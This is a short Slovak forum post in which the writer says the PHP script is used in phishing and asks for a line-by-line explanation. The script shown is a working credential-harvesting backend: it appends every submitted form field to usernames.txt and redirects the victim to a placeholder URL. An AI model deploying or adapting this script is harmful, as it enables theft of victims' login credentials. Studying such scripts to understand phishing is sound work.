Ahojte prosím Vás mohol by mi niekto presne popísať čo ma za úlohu tento skript... Viem že sa používa v phisingu,. no mňa zaujímajú jednotlivé riadky skriptu čo ma každý riadok za úlohu.
prosim o vysvetlenie jednotlivych riadkov Dik
Kód:
<?php
header ('Location:type the URL of the site hear');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>